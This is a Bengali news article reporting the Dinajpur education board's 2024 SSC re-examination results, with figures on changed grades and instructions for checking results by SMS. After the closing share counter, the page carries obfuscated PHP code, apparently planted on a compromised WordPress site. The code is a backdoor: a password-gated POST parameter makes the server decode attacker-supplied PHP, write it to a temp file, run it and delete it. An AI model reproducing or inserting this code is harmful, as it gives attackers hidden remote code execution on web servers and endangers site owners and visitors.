এসএসসি পুনঃনিরীক্ষণের ফল : দিনাজপুর বোর্ডে নতুন জিপিএ-৫ পেল ১৫৬, নতুন পাস ৫০


শিক্ষা সংবাদ প্রকাশের সময় : জুন ১১, ২০২৪, ৭:৩১ অপরাহ্ণ /
এসএসসি পুনঃনিরীক্ষণের ফল : দিনাজপুর বোর্ডে নতুন জিপিএ-৫ পেল ১৫৬, নতুন পাস ৫০
0Shares

২০২৪ সালের এসএসসি পরীক্ষার খাতা পুনঃনিরীক্ষণের ফল প্রকাশ করেছে দিনাজপুর শিক্ষা বোর্ড।

আজ মঙ্গলবার (১১ জুন) এ ফল প্রকাশ করা হয়েছে। দিনাজপুর শিক্ষা বোর্ডের ওয়েবসাইটের মাধ্যমে এ ফল দেখা যাবে।

এর আগে, আন্তঃশিক্ষাবোর্ড সমন্বয় কমিটির সভাপতি এবং ঢাকা শিক্ষা বোর্ডের চেয়ারম্যান অধ্যাপক তপন কুমার সরকার ১১ জুন ফল প্রকাশের তথ্য জানিয়েছেন।

প্রকাশিত ফলাফলে দেখা যায়, দিনাজপুর বোর্ডে ফেল থেকে পাস করেছে ৫০ শিক্ষার্থী। নতুন করে জিপিএ-৫ পেয়েছে ১৫৬ জন শিক্ষার্থী। এছাড়াও ফেল থেকে জিপিএ-৫ পেয়েছেন দুইজন শিক্ষার্থী। ফল পরিবর্তন হয়েছে মোট ৮৭৭ জন শিক্ষার্থী।

গত ১২ মে চলতি বছরের এসএসসি ও সমমান পরীক্ষার ফল প্রকাশ করা হয়। এ বছর ৯টি সাধারণ, মাদরাসা ও কারিগরি বোর্ডে গড় পাসের হার ৮৩.০৪ শতাংশ। প্রতিবারের মত এবারও প্রকাশিত ফলাফলে কারও কাঙ্ক্ষিত ফল না এলে পুনঃর্নিরীক্ষণ আবেদন বা খাতা চ্যালেঞ্জ করার সুযোগ দেওয়া হয়। ফল পুনঃনিরীক্ষার আবেদন ফি নির্ধারণ করা হয় প্রতি পত্রের জন্য ১২৫ টাকা।

গত ১২ মে ঢাকা মাধ্যমিক ও উচ্চশিক্ষা বোর্ডের বিজ্ঞপ্তি অনুযায়ী, ফল পুনঃনিরীক্ষণ আবেদন ১৩ মে থেকে শুরু হয়ে চলে ১৯ মে পর্যন্ত। পুনঃনিরীক্ষণের সময় বাড়ানো হবে না বলেও তখন জানানো হয়েছিল।

এবছর খাতা পুনঃনিরীক্ষণের জন্য আবেদন করেছিলো ৭০ হাজার ১২৯ জন শিক্ষার্থী। তারা ১ লাখ ৭৯হাজার ১৪৮ টি খাতা চ্যালেঞ্জ করেছিলো।

এসএমএসের মাধ্যমে এসএসসি পরীক্ষার ফল দেখবেন যেভাবে : এসএমএসের মাধ্যমেও ফল জানা যাবে। সে ক্ষেত্রে মোবাইলের মেসেজ অপশনে গিয়ে SSC লিখে স্পেস দিয়ে ইংরেজিতে বোর্ডের প্রথম তিন অক্ষর লিখে স্পেস দিয়ে রোল নম্বর দিতে হবে। এরপর স্পেস দিয়ে পরীক্ষার বছর লিখে 16222 নম্বরে পাঠাতে হবে। (উদাহরণ-SSC Dha ROLL YEAR)। ফিরতি মেসেজে ফল জানিয়ে দেয়া হবে।

দিনাজপুর বোর্ডের এসএসসি পরীক্ষার পুনঃনিরীক্ষণের ফল দেখতে ক্লিক করুন এখানে

এসএসসি ও সমমানের পরীক্ষার পুনঃনিরীক্ষণের ফল দেখতে ক্লিক করুন এখানে 

0Shares
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}